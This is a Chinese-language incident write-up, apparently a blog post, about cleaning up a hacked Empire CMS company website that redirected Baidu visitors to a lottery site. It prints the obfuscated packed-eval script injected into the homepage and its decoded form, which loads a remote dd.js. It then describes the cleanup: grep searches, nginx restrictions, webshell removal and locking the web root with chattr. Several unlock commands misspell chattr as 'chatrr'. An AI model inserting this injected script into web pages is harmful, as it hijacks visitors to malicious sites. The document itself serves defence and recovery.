背景:
集团官网，是多年前基于帝国框架来写的
近期发现被黑
服务器部署在阿里云上

现象:
直接输入域名和ip访问正常
从谷歌搜索然后点击进去正常
从百度搜索然后点击进入不正常，被连接到大地彩票界面


排查处理:
异常界面中f12查看相关信息，在header中找到连接的js,找到备份，然后删除(bootstrap.min.css)
进入集团官网主页html
title被修改，然后增加了如下信息:
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('j["\\7\\e\\1\\l\\i\\9\\m\\0"]["\\8\\5\\a\\0\\9"](\'\\g\\2\\1\\5\\a\\3\\0 \\0\\k\\3\\9\\d\\6\\0\\9\\q\\0\\4\\f\\b\\r\\b\\2\\1\\5\\a\\3\\0\\6 \\2\\5\\1\\d\\6\\p\\0\\0\\3\\2\\n\\4\\4\\8\\8\\8\\c\\1\\3\\7\\b\\2\\o\\c\\1\\e\\i\\4\\7\\7\\c\\f\\2\\6\\h\\g\\4\\2\\1\\5\\a\\3\\0\\h\');',28,28,'x74|x63|x73|x70|x2f|x72|x22|x64|x77|x65|x69|x61|x2e|x3d|x6f|x6a|x3c|x3e|x6d|window|x79|x75|x6e|x3a|x38|x68|x78|x76'.split('|'),0,{}))
通过解密和解码，得到以下内容：
window["document"]["write"]('<script type="text/javascript" src="https://www.cpdas8.com/dd.js"></script>');
现在一目了然了，被注入了dd.js之后就会强制跳转至https://www.dddas8tz.com


修改titile和删除该部分信息发现网站依然异常
在网站根目录下 grep -rl "x74|x63|x73|x70|x2f|x72|x22|x64|x77|x65|x69|x61|x2e|x3d|x6f|x6a|x3c|x3e|x6d|window|x79|x75|x6e|x3a|x38|x68|x78|x76'.split" ./*
发现一个js文件jquery_1_7.js和一个index.php也被修改，从网上https://www.bootcdn.cn/ 下载相同版本的js替换被修改的，然后index.php该段代码给删除掉，网站恢复正常 

备份网站（如之前没有备份则需要备份，如有备份则无需备份）

但是好景不长大概几个小时后发现同样的异常现象又重复出现
(中间排查服务器是否有后门和异常情况，操作记录，登陆日志，暴力破解日志,审计日志等排查均无异常；断定不是从服务器进入的，那肯定是从漏洞进入的)

登陆阿里云查看云盾监控发现有很多个webshell被植入

1. 关闭网站然后按照云盾提示，拉黑相关IP并找到相关的webshell并进行删除或者修改，总之使之后门失效
2. 通过nginx做访问限制，1) 将后台地址只能通过公司内部和本地访问   2)以*.php结尾的也做访问限制只能通过公司内部和本地访问
重启网站正常

还是一样，好景不长网站几小时后又出现异常



重复上述排查处理后:
从几次的排查发现黑客主要更改的目录都是项目根目录，此时想来了一个办法，就是将网站停掉，然后进行上述恢复，OK后将网站根目录给锁定不让更改删除移动 chattr -RVf +i ./abc_html
重启网站，通过长时间观察发现网站没有再出现异常，说明该设置有效



但是锁定项目根目录后发现后台登陆界面无法登陆
通过观察其登录地址知道与其相关的目录是项目根目录的e目录和news目录
将该已经锁定的目录放开
chatrr -RVf -i ./e 
chatrr -RVf -i ./news

再次登录正常
新闻发布正常





 








